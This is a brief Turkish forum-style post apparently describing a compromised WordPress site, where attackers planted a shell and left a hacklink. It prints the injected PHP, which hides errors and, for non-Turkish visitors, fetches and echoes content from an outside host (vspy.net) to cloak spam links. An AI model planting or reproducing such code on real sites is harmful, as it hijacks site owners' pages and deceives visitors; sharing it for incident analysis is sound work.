En son curl ile hacklink bırakmışlardı .... ..... . Arkadaşın Wordpressine shelli yedirmişler, ordan dolaşmışlar. Shelli de bakın sunucu içinde.
error_reporting(0); if (!strstr($_SERVER['HTTP_ACCEPT_LANGUAGE'],"tr")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://www.vspy.net/1.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data=curl_exec($ch);curl_close($ch);echo $data;}
exit;